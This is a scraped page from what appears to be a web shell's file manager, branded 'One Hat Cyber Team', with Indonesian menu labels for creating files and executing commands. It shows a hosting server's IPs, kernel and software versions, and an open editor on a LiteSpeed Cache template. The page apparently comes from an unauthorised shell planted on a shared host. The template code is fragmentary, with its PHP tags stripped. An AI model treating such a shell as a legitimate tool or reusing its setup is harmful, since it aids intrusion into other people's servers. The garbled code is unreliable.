⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.140
Server IP:
68.65.123.197
Server:
Linux premium49.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
local
/
lsws
/
add-ons
/
webcachemgr
/
src
/
View
/
Tpl
/
Edit File: MassEnableDisableProgress.tpl
viewModel->getTplData(ViewModel::FLD_ICON); $action = $this->viewModel->getTplData(ViewModel::FLD_ACTION); $installsCount = $this->viewModel->getTplData(ViewModel::FLD_INSTALLS_COUNT); $activeVer = $this->viewModel->getTplData(ViewModel::FLD_ACTIVE_VER); $actionUpper = ucfirst($action); $d = array( 'title' => 'Mass ' . substr($actionUpper, 0, -1) . 'ing All LiteSpeed Cache Plugins...', 'icon' => $icon ); $this->loadTplBlock('Title.tpl', $d); if ( $action == 'enable' && $activeVer == false ): ?>
No active LSCWP version set! Mass Enable aborted.
'OK' ); $this->loadTplBlock('ButtonPanelBackNext.tpl', $d); else: ?>
Attempting to
0
out of
...
Currently attempting to all LiteSpeed Cache plugin installations. If the LiteSpeed Cache Plugin is not installed, version
will be used. Please be patient.
0
flagged/error WordPress installation(s) bypassed.", "LSCWP newly {$action}d for
0
WordPress installation(s).", "LSCWP {$action} failed for
0
WordPress " . "installation(s)." ); $d = array( 'msgs' => $msgs, 'class' => 'msg-info', ); $this->loadTplBlock('DivMsgBox.tpl', $d); $d = array( 'back' => 'OK', 'visibility' => 'hidden' ); $this->loadTplBlock('ButtonPanelBackNext.tpl', $d); ?>
Error Messages
0
'errMsgs', 'class' => 'scrollable', ); $this->loadTplBlock('DivMsgBox.tpl', $d); ?>
Success Messages
0
'succMsgs', 'class' => 'scrollable', 'title' => 'Success Messages:', ); $this->loadTplBlock('DivMsgBox.tpl', $d); ?>
Simpan